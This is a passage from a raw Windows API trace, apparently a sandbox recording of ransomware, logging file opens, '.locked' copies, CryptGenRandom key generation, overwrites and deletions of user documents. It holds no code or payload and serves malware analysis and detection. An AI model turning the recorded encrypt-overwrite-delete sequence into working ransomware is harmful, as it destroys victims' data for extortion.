"c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\wpdqcdicadj00.flv")) returned 1 [0320.509] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0320.574] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0x1) returned 0x102 [0320.580] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0320.580] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x340afb30, ulCount=0x10, ulNumEntriesRemoved=0x340afb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x340afb30, ulNumEntriesRemoved=0x340afb10) returned 0 [0320.580] SetEvent (hEvent=0x150) returned 1 [0320.580] SetEvent (hEvent=0x190) returned 1 [0320.580] SetEvent (hEvent=0x14c) returned 1 [0320.580] SetEvent (hEvent=0x1ac) returned 1 [0320.606] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\wpDqCDIcADj00.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\wpdqcdicadj00.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0320.644] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0320.903] SetEvent (hEvent=0x220) returned 1 [0320.903] GetConsoleMode (in: hConsoleHandle=0x200, lpMode=0x125e3e88 | out: lpMode=0x125e3e88) returned 0 [0320.903] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0321.001] WriteFile (in: hFile=0x200, lpBuffer=0x1791a000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x125e3e78, lpOverlapped=0x0 | out: lpBuffer=0x1791a000*, lpNumberOfBytesWritten=0x125e3e78*=0xfa000, lpOverlapped=0x0) returned 1 [0321.077] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0321.115] CloseHandle (hObject=0x200) returned 1 [0321.124] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0321.128] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\wpDqCDIcADj00.flv" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\wpdqcdicadj00.flv")) returned 1 [0321.151] SetEvent (hEvent=0x22c) returned 1 [0321.151] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) returned 0x0 [0321.204] SetEvent (hEvent=0x190) returned 1 [0321.204] SetEvent (hEvent=0x220) returned 1 [0321.204] WaitForSingleObject (hHandle=0x21c, dwMilliseconds=0xffffffff) Thread: id = 447 os_tid = 0x1278 [0265.590] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32daff58, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32daff58*=0x204) returned 1 [0265.590] SetEvent (hEvent=0x1ac) returned 1 [0265.590] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x198 [0265.590] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0270.069] SetEvent (hEvent=0x184) returned 1 [0270.069] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0270.095] SetEvent (hEvent=0x184) returned 1 [0270.095] SetEvent (hEvent=0x12c) returned 1 [0270.095] SetEvent (hEvent=0x1d0) returned 1 [0270.095] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0280.201] SetEvent (hEvent=0x14c) returned 1 [0280.201] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e1a0*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12623a24, lpReserved=0x0 | out: lpBuffer=0x1263e1a0*, lpNumberOfCharsWritten=0x12623a24*=0xb) returned 1 [0280.211] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0280.513] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0280.542] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0280.610] SetEvent (hEvent=0x220) returned 1 [0280.610] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0280.789] SetEvent (hEvent=0x134) returned 1 [0280.789] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0282.063] SetEvent (hEvent=0x1ac) returned 1 [0282.064] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0282.147] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0282.207] SetEvent (hEvent=0x21c) returned 1 [0282.207] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0x1) returned 0x102 [0282.354] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0282.354] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0x1) returned 0x102 [0282.394] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0282.394] SetEvent (hEvent=0x14c) returned 1 [0282.394] SetEvent (hEvent=0x21c) returned 1 [0282.394] SetEvent (hEvent=0x134) returned 1 [0282.394] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0282.447] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x32dafb34, ulCount=0x10, ulNumEntriesRemoved=0x32dafb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x32dafb34, ulNumEntriesRemoved=0x32dafb14) returned 0 [0282.447] SetEvent (hEvent=0x134) returned 1 [0282.447] SetEvent (hEvent=0x21c) returned 1 [0282.447] SetEvent (hEvent=0x220) returned 1 [0282.447] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0282.656] SetEvent (hEvent=0x20c) returned 1 [0282.656] SetEvent (hEvent=0x1b8) returned 1 [0282.656] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0282.704] SetEvent (hEvent=0x20c) returned 1 [0282.704] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0282.845] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1261fa24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x1261fa24*=0xb) returned 1 [0282.862] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\7g-3nq2zvxE4VIk.png" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\7g-3nq2zvxe4vik.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0282.862] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x1261fd9c | out: lpMode=0x1261fd9c) returned 0 [0282.862] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\7g-3nq2zvxE4VIk.png.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\7g-3nq2zvxe4vik.png.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0283.415] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1261fd9c | out: lpMode=0x1261fd9c) returned 0 [0283.415] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390040 | out: pbBuffer=0x12390040) returned 1 [0283.415] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8050 | out: pbBuffer=0x124a8050) returned 1 [0283.415] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0283.415] WriteFile (in: hFile=0x1b0, lpBuffer=0x12705000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1261fd78, lpOverlapped=0x0 | out: lpBuffer=0x12705000*, lpNumberOfBytesWritten=0x1261fd78*=0x80, lpOverlapped=0x0) returned 1 [0283.455] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0x1) returned 0x102 [0283.555] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0283.555] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x32dafb30, ulCount=0x10, ulNumEntriesRemoved=0x32dafb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x32dafb30, ulNumEntriesRemoved=0x32dafb10) returned 0 [0283.555] SetEvent (hEvent=0x14c) returned 1 [0283.555] SetEvent (hEvent=0x220) returned 1 [0283.555] SetEvent (hEvent=0x134) returned 1 [0283.556] ReadFile (in: hFile=0x19c, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1261fd68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x1261fd68*=0x14adf, lpOverlapped=0x0) returned 1 [0283.559] WriteFile (in: hFile=0x1b0, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x14adf, lpNumberOfBytesWritten=0x1261fd74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x1261fd74*=0x14adf, lpOverlapped=0x0) returned 1 [0283.784] ReadFile (in: hFile=0x19c, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1261fd68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x1261fd68*=0x0, lpOverlapped=0x0) returned 1 [0283.784] CloseHandle (hObject=0x1b0) returned 1 [0283.788] CloseHandle (hObject=0x19c) returned 1 [0283.788] SetEvent (hEvent=0x1dc) returned 1 [0283.788] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0283.885] SetEvent (hEvent=0x214) returned 1 [0283.886] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0283.939] SetEvent (hEvent=0x184) returned 1 [0283.939] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0284.077] WriteFile (in: hFile=0x180, lpBuffer=0x1780c000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1276ee78, lpOverlapped=0x0 | out: lpBuffer=0x1780c000*, lpNumberOfBytesWritten=0x1276ee78*=0xfa000, lpOverlapped=0x0) returned 1 [0284.106] CloseHandle (hObject=0x180) returned 1 [0284.360] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0284.484] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0284.506] SetEvent (hEvent=0x214) returned 1 [0284.507] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0284.558] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e020*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1261fa24, lpReserved=0x0 | out: lpBuffer=0x1263e020*, lpNumberOfCharsWritten=0x1261fa24*=0xb) returned 1 [0284.716] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\pVnv3JR1eBRll.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\pvnv3jr1ebrll.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0284.716] GetConsoleMode (in: hConsoleHandle=0x228, lpMode=0x1261fd9c | out: lpMode=0x1261fd9c) returned 0 [0284.716] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\pVnv3JR1eBRll.xls.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\pvnv3jr1ebrll.xls.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0284.717] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x1261fd9c | out: lpMode=0x1261fd9c) returned 0 [0284.717] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e040 | out: pbBuffer=0x1263e040) returned 1 [0284.717] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x123920f0 | out: pbBuffer=0x123920f0) returned 1 [0284.717] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340281 | out: pbBuffer=0x12340281) returned 1 [0284.717] WriteFile (in: hFile=0x188, lpBuffer=0x12704000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1261fd78, lpOverlapped=0x0 | out: lpBuffer=0x12704000*, lpNumberOfBytesWritten=0x1261fd78*=0x80, lpOverlapped=0x0) returned 1 [0284.721] ReadFile (in: hFile=0x228, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1261fd68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x1261fd68*=0x36de, lpOverlapped=0x0) returned 1 [0284.723] WriteFile (in: hFile=0x188, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x36de, lpNumberOfBytesWritten=0x1261fd74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x1261fd74*=0x36de, lpOverlapped=0x0) returned 1 [0284.932] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0285.800] ReadFile (in: hFile=0x228, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1261fd68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x1261fd68*=0x0, lpOverlapped=0x0) returned 1 [0285.800] CloseHandle (hObject=0x188) returned 1 [0286.058] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0286.545] CloseHandle (hObject=0x228) returned 1 [0286.545] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0286.852] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0286.853] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x1261fe94 | out: lpMode=0x1261fe94) returned 0 [0286.853] WriteFile (in: hFile=0x1f4, lpBuffer=0x125ec0a0*, nNumberOfBytesToWrite=0x47, lpNumberOfBytesWritten=0x1261fe64, lpOverlapped=0x0 | out: lpBuffer=0x125ec0a0*, lpNumberOfBytesWritten=0x1261fe64*=0x47, lpOverlapped=0x0) returned 1 [0286.853] CloseHandle (hObject=0x1f4) returned 1 [0286.855] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\u5XgcDVp\\pVnv3JR1eBRll.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\u5xgcdvp\\pvnv3jr1ebrll.xls")) returned 1 [0287.086] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0287.501] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0287.536] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0287.620] SetEvent (hEvent=0x190) returned 1 [0287.620] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0298.503] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc020*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x123a1a24, lpReserved=0x0 | out: lpBuffer=0x125fc020*, lpNumberOfCharsWritten=0x123a1a24*=0xb) returned 1 [0298.529] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\XxX9zS.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xxx9zs.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0298.529] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x123a1d9c | out: lpMode=0x123a1d9c) returned 0 [0298.529] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\XxX9zS.ods.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xxx9zs.ods.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0299.854] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0299.963] SetEvent (hEvent=0x184) returned 1 [0299.963] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x123a1d9c | out: lpMode=0x123a1d9c) returned 0 [0299.963] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0299.975] SetEvent (hEvent=0x21c) returned 1 [0299.975] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0299.977] SetEvent (hEvent=0x1dc) returned 1 [0299.977] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0300.025] SetEvent (hEvent=0x134) returned 1 [0300.025] SetEvent (hEvent=0x22c) returned 1 [0300.025] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0300.064] SetEvent (hEvent=0x20c) returned 1 [0300.064] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0x1) returned 0x102 [0300.073] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0300.073] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0x1) returned 0x0 [0300.077] SetEvent (hEvent=0x22c) returned 1 [0300.077] SetEvent (hEvent=0x21c) returned 1 [0300.077] SetEvent (hEvent=0x12c) returned 1 [0300.077] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0300.078] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x32dafb34, ulCount=0x10, ulNumEntriesRemoved=0x32dafb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x32dafb34, ulNumEntriesRemoved=0x32dafb14) returned 0 [0300.078] SetEvent (hEvent=0x150) returned 1 [0300.078] SetEvent (hEvent=0x12c) returned 1 [0300.133] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\GPvOBFfXu_XAefB06.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gpvobffxu_xaefb06.doc"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x230 [0300.426] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0300.491] SetEvent (hEvent=0x150) returned 1 [0300.491] SetEvent (hEvent=0x1b8) returned 1 [0300.491] GetConsoleMode (in: hConsoleHandle=0x230, lpMode=0x124a0e88 | out: lpMode=0x124a0e88) returned 0 [0300.491] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0301.096] WriteFile (in: hFile=0x230, lpBuffer=0x13cfc000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x124a0e78, lpOverlapped=0x0 | out: lpBuffer=0x13cfc000*, lpNumberOfBytesWritten=0x124a0e78*=0xfa000, lpOverlapped=0x0) returned 1 [0301.146] CloseHandle (hObject=0x230) returned 1 [0301.204] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\GPvOBFfXu_XAefB06.doc" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gpvobffxu_xaefb06.doc")) returned 1 [0301.516] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0x1) returned 0x0 [0301.521] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x32dafb30, ulCount=0x10, ulNumEntriesRemoved=0x32dafb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x32dafb30, ulNumEntriesRemoved=0x32dafb10) returned 0 [0301.521] SetEvent (hEvent=0x150) returned 1 [0301.521] SetEvent (hEvent=0x184) returned 1 [0301.521] SetEvent (hEvent=0x1f0) returned 1 [0301.521] SetEvent (hEvent=0x1dc) returned 1 [0301.523] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0x1) returned 0x102 [0301.529] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0301.529] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc020*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12625a24, lpReserved=0x0 | out: lpBuffer=0x125fc020*, lpNumberOfCharsWritten=0x12625a24*=0xb) returned 1 [0301.531] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0x1) returned 0x102 [0301.534] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0301.534] SetEvent (hEvent=0x12c) returned 1 [0301.534] SetEvent (hEvent=0x214) returned 1 [0301.534] SetEvent (hEvent=0x20c) returned 1 [0301.534] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0301.535] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x32dafb34, ulCount=0x10, ulNumEntriesRemoved=0x32dafb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x32dafb34, ulNumEntriesRemoved=0x32dafb14) returned 0 [0301.535] SetEvent (hEvent=0x150) returned 1 [0301.535] SetEvent (hEvent=0x20c) returned 1 [0301.535] SetEvent (hEvent=0x214) returned 1 [0301.536] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\4bt-B2q.pdf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\4bt-b2q.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0301.541] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x12669e88 | out: lpMode=0x12669e88) returned 0 [0301.541] WriteFile (in: hFile=0x218, lpBuffer=0x12e8a000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12669e78, lpOverlapped=0x0 | out: lpBuffer=0x12e8a000*, lpNumberOfBytesWritten=0x12669e78*=0xfa000, lpOverlapped=0x0) returned 1 [0302.071] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0302.129] SetEvent (hEvent=0x12c) returned 1 [0302.129] CloseHandle (hObject=0x218) returned 1 [0302.195] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0302.700] SetEvent (hEvent=0x134) returned 1 [0302.700] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0302.701] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0303.046] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\8BJrk8.pps" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\8bjrk8.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0303.047] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x12625d9c | out: lpMode=0x12625d9c) returned 0 [0303.047] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\8BJrk8.pps.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\8bjrk8.pps.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0303.771] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0303.798] SetEvent (hEvent=0x150) returned 1 [0303.798] SetEvent (hEvent=0x1f0) returned 1 [0303.799] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x12625d9c | out: lpMode=0x12625d9c) returned 0 [0303.799] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0303.827] SetEvent (hEvent=0x134) returned 1 [0303.827] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0303.828] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0303.837] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0303.847] SetEvent (hEvent=0x22c) returned 1 [0303.847] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0x1) returned 0x102 [0303.854] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0303.854] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0x1) returned 0x0 [0303.871] SetEvent (hEvent=0x12c) returned 1 [0303.871] SetEvent (hEvent=0x1ac) returned 1 [0303.871] SetEvent (hEvent=0x190) returned 1 [0303.871] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0303.872] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x32dafb34, ulCount=0x10, ulNumEntriesRemoved=0x32dafb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x32dafb34, ulNumEntriesRemoved=0x32dafb14) returned 0 [0303.872] SetEvent (hEvent=0x150) returned 1 [0303.872] SetEvent (hEvent=0x12c) returned 1 [0303.872] SetEvent (hEvent=0x1ac) returned 1 [0303.872] SetEvent (hEvent=0x190) returned 1 [0303.872] SetEvent (hEvent=0x104) returned 1 [0303.872] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0303.929] SetEvent (hEvent=0x12c) returned 1 [0303.929] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0303.932] SetEvent (hEvent=0x22c) returned 1 [0303.932] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0304.054] SetEvent (hEvent=0x12c) returned 1 [0304.054] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0x1) returned 0x102 [0304.058] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0304.058] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0x1) returned 0x0 [0304.059] SetEvent (hEvent=0x190) returned 1 [0304.059] SetEvent (hEvent=0x1dc) returned 1 [0304.059] SetEvent (hEvent=0x12c) returned 1 [0304.059] WaitForSingleObject (hHandle=0x198, dwMilliseconds=0xffffffff) returned 0x0 [0304.061] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x32dafb34, ulCount=0x10, ulNumEntriesRemoved=0x32dafb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x32dafb34, ulNumEntriesRemoved=0x32dafb14) returned 0 [0304.061] SetEvent (hEvent=0x150) returned 1 [0304.061] SetEvent (hEvent=0x190) returned 1 [0304.061] SetEvent (hEvent=0x1dc) returned 1 [0304.061] SetEvent (hEvent=0x12c) returned 1 [0304.061] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0304.061] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e030 | out: pbBuffer=0x1234e030) returned 1 [0304.061] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12714001 | out: pbBuffer=0x12714001) returned 1 [0304.062] WriteFile (in: 